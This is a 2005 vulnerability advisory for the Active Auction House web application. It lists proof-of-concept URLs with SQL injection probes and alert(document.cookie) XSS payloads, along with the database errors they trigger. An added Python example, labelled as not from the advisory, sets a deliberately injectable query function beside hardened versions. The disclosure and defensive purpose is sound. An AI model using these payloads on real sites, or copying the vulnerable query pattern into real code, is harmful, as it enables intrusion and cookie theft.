-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dcrab's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah

Severity: High
Title: Active Auction House has multiple SQL injection, error and XSS vulnerabilities
Date: 06/04/2005

Vendor: Active Web Softwares
Vendor Website: www.activewebsoftwares.com
Summary: Active Auction House has multiple SQL injection, error disclosure and XSS vulnerabilities.

Proof of Concept Exploits:

http://localhost/activeauctionsuperstore/default.asp?catid='SQL_ERROR
SQL ERROR
Microsoft OLE DB Provider for ODBC Drivers error '80040e21'
ODBC driver does not support the requested properties.
/activeauctionsuperstore/displaycategories.asp, line 52

http://localhost/activeauctionsuperstore/default.asp?Sortby=ItemName&SortDir='SQL_INJECTION
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'ItemName 'SQL_INJECTION'.
/activeauctionsuperstore/includes/gentable.asp, line 39

http://localhost/activeauctionsuperstore/default.asp?Sortby='SQL_INJECTION
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression ''SQL_INJECTION'.
/activeauctionsuperstore/includes/gentable.asp, line 39

http://localhost/activeauctionsuperstore/ItemInfo.asp?itemID='SQL_INJECTION
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'ItemID='SQL_INJECTION'.
/activeauctionsuperstore/ItemInfo.asp, line 18

http://localhost/activeauctionsuperstore/sendpassword.asp
SQL INJECTION
In the Email field enter a SQL injection and done ;) For example, entering 'SQL_INJECTION you get:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in FROM clause.
/activeauctionsuperstore/sendpassword.asp, line 45

http://localhost/activeauctionsuperstore/?ReturnURL='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&username=dcrab&password=
Pops cookie

http://localhost/activeauctionsuperstore/?ReturnURL=start.asp&username=dcrab&password='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie

http://localhost/activeauctionsuperstore/?ReturnURL=start.asp&username='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&&password=
Pops cookie

http://localhost/activeauctionsuperstore/account.asp?ReturnURL=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie

http://localhost/activeauctionsuperstore/sendpassword.asp?Table=Accounts&Title='php_evil_valuehttp://localhost/activeauctionsuperstore/sendpassword.asp?Table=Accounts&Title=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie

http://localhost/activeauctionsuperstore/sendpassword.asp?Table=Accounts&Title="><script>alert(document.cookie)</script>
Pops cookie

http://localhost/activeauctionsuperstore/sendpassword.asp?Table="><script>alert(document.cookie)</script>&Title=Account
Pops cookie

http://localhost/activeauctionsuperstore/watchthisitem.asp?itemid="><script>alert(document.cookie)</script>&%3baccountid=
Pops cookie

Possible Fixes: The usage of htmlspecialchars(), mysql_escape_string(), mysql_real_escape_string() and other functions for input validation before passing user input to the mysql database, or before echoing data on the screen, would solve these problems.
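The following is an added example, not code from the advisory or from the vendor's product: it puts the three patterns reported above (string-built SQL, request values reflected into HTML, and the raw ODBC error text reaching the client) next to hardened counterparts. It uses Python's sqlite3 in place of the product's ASP/Access stack, uses parameterised queries and an allow-list for the Sortby/SortDir identifiers instead of the escaping functions named in the fix, and the table name, column names and sample rows are constructed, not the product's real schema.

```python
"""Hardened counterparts to the patterns in the advisory above.

sqlite3 stands in for the Access/ODBC backend. The Items table, its
columns (ItemID, ItemName, Price) and the rows are assumptions made up
for this example, not the product's schema.
"""
import html
import sqlite3

# Constructed sample rows standing in for the auction item table.
SAMPLE_ITEMS = [
    (1, "Vintage radio", 25.0),
    (2, "Oak desk", 140.0),
]

# ORDER BY column names and directions cannot be bound as query
# parameters, so they are validated against an allow-list instead.
SORTABLE_COLUMNS = {"ItemID": "ItemID", "ItemName": "ItemName", "Price": "Price"}
SORT_DIRECTIONS = {"ASC": "ASC", "DESC": "DESC"}

# What the client sees on a backend failure; the real error goes to a log.
GENERIC_ERROR = "An error occurred. Please try again later."


def make_db():
    """Create an in-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Items (ItemID INTEGER PRIMARY KEY, ItemName TEXT, Price REAL)")
    conn.executemany("INSERT INTO Items VALUES (?, ?, ?)", SAMPLE_ITEMS)
    return conn


def vulnerable_lookup(conn, item_id):
    """String-concatenated query, the shape behind the advisory's
    'Syntax error in string in query expression' when item_id is 'SQL_INJECTION."""
    sql = "SELECT ItemID, ItemName, Price FROM Items WHERE ItemID='" + item_id + "'"
    return conn.execute(sql).fetchone()


def safe_lookup(conn, item_id):
    """Parameterised query: the value is bound, never parsed as SQL.
    The ID is also type-checked before it reaches the database."""
    if not item_id.isdigit():
        return None
    return conn.execute(
        "SELECT ItemID, ItemName, Price FROM Items WHERE ItemID = ?", (int(item_id),)
    ).fetchone()


def safe_sorted_items(conn, sort_by, sort_dir):
    """ORDER BY built only from allow-listed identifiers (Sortby/SortDir)."""
    column = SORTABLE_COLUMNS.get(sort_by)
    direction = SORT_DIRECTIONS.get(sort_dir.upper())
    if column is None or direction is None:
        raise ValueError("unsupported sort parameter")
    sql = "SELECT ItemID, ItemName, Price FROM Items ORDER BY %s %s" % (column, direction)
    return conn.execute(sql).fetchall()


def hidden_field(name, value):
    """Reflect a request value (ReturnURL, Title, username) into an HTML
    attribute with quote-safe encoding, so "><script> cannot close it."""
    return '<input type="hidden" name="%s" value="%s">' % (
        html.escape(name, quote=True), html.escape(value, quote=True))


def handle_lookup(conn, item_id, lookup=safe_lookup):
    """Request handler that never echoes the database driver's error text.
    'lookup' is injectable only so the vulnerable variant can be compared."""
    try:
        row = lookup(conn, item_id)
    except sqlite3.Error as exc:
        # Keep the provider message server-side (print stands in for a logger).
        print("db error for item_id=%r: %s" % (item_id, exc))
        return GENERIC_ERROR
    if row is None:
        return "Item not found."
    return "<h1>%s</h1>" % html.escape(row[1])


if __name__ == "__main__":
    db = make_db()
    probe = "'SQL_INJECTION"  # the advisory's own probe string
    print(handle_lookup(db, probe, lookup=vulnerable_lookup))  # generic message, error logged
    print(handle_lookup(db, probe))                            # "Item not found."
    print(hidden_field("ReturnURL", '"><script>alert(document.cookie)</script>'))
```

The ORDER BY case is the one to note: parameter binding only covers values, so the Sortby and SortDir parameters from the advisory have to be mapped through an allow-list; escaping them as strings would not help there.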
Keep yourself updated, RSS feed at: http://digitalparadox.org/rss.ah

Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://digitalparadox.org/. Look out for my soon to come out book on Secure coding with PHP.

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com

iQA/AwUBQlLSLSZV5e8av/DUEQJy+wCfficKxFWekfTVbslFf6X2fYgkFZ0AniJA
lWYvwOWmoKGHgDKanamGDcvc
=GAwn
-----END PGP SIGNATURE-----